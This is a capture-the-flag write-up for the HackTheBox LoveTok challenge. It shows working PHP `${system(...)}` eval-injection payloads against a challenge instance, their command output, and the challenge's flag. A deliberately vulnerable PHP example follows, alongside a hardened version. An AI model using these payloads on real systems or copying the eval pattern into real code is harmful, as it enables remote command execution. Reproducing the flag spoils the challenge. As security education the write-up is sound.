Disclaimer: this tutorial is for academic discussion only. Do not use it for illegal purposes! The author accepts no responsibility for any illegal use.
Challenge source
HackTheBox LoveTok. The challenge runs as a Docker container; once the instance is spawned, open its address in a browser.
Steps and approach
Download the challenge files and review the source. The `format` parameter is interpolated into a double-quoted PHP string that is then passed to `eval()`, so PHP's `${...}` complex string syntax lets us execute arbitrary code (in effect a PHP code injection that we turn into command execution through `system()`). Bare words such as `whoami` or `pwd` work as arguments because PHP 7 coerces an undefined constant to its own name as a string; a command containing spaces or slashes is instead passed in through a second GET parameter and read back with `$_GET[1]`, so no quotes ever have to appear inside `format`.
http://157.245.42.220:30361/?format=${system(phpinfo())}
response: phpinfo page
http://157.245.42.220:30361/?format=${system(whoami)}
response: www
http://157.245.42.220:30361/?format=${system(pwd)}
response: /www
http://157.245.42.220:30361/?format=${system(ls)}
http://157.245.42.220:30361/?format=${system($_GET[1])}&1=ls
response: Router.php assets controllers index.php models static views
http://157.245.42.220:30361/?format=${system($_GET[1])}&1=ls+/
response: bin boot dev entrypoint.sh etc flagkj75g home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var www
http://157.245.42.220:30361/?format=${system($_GET[1])}&1=cat+/flagkj75g
response: HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}
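The bug class behind the payloads above, as an added example that is not the LoveTok source (the page does not show the application's code). The `addslashes()` filter and the `date()`/`strtotime()` wrapper are assumptions chosen to match the shape of the payloads (no quotes, the real command smuggled in through `&1=`); `vulnerable_time()` and `safe_time()` are illustrative names. The example runs locally with the PHP CLI and uses `echo injected` in place of `ls` or `cat` so it is harmless:

```php
<?php
// Added example, not the challenge's own code. Reproduces the bug class
// exploited in the writeup: user input lands inside a double-quoted string
// that is handed to eval(), so PHP's ${expr} string syntax evaluates expr.

function vulnerable_time(string $format): string
{
    // Assumed filter: addslashes() escapes quotes and backslashes, so the
    // attacker cannot break out of the string literal. It does nothing about
    // ${...} interpolation, which needs no quotes at all. Because the string
    // is built and then eval()'d, PHP evaluates ${system(...)} before date()
    // ever sees the format.
    $format = addslashes($format);
    $time = '';
    eval('$time = date("' . $format . '", strtotime("now"));');
    return $time;
}

function safe_time(string $format): string
{
    // Hardened form: the format is treated as data, never as code. date()
    // receives it as an ordinary argument and a strict whitelist rejects
    // anything that is not a known-good format string.
    $allowed = ['r', 'c', 'Y-m-d', 'Y-m-d H:i:s'];
    if (!in_array($format, $allowed, true)) {
        $format = 'r';
    }
    return date($format, strtotime('now'));
}

// Simulate the request ?format=${system($_GET[1])}&1=... from the writeup.
// PHP stores the numeric query key as integer 1, hence $_GET[1] in the payload.
$_GET['1'] = 'echo injected';          // stands in for "ls" or "cat /flagkj75g"
$payload   = '${system($_GET[1])}';     // survives addslashes() unchanged

echo "vulnerable:\n";
// system() runs first and prints "injected"; its return value ("injected")
// is then used as a variable name, $injected is undefined, so date("") yields "".
vulnerable_time($payload);

echo "safe: ", safe_time($payload), "\n";   // payload rejected, falls back to 'r'
```

Running this prints `injected` from the vulnerable path (the command executed) while the hardened path simply returns the current date in RFC 2822 format. The fix is not a better escaping function: `addslashes()` was already in place in the assumed vulnerable version and the injection still worked. The fix is to stop constructing PHP code from request data at all.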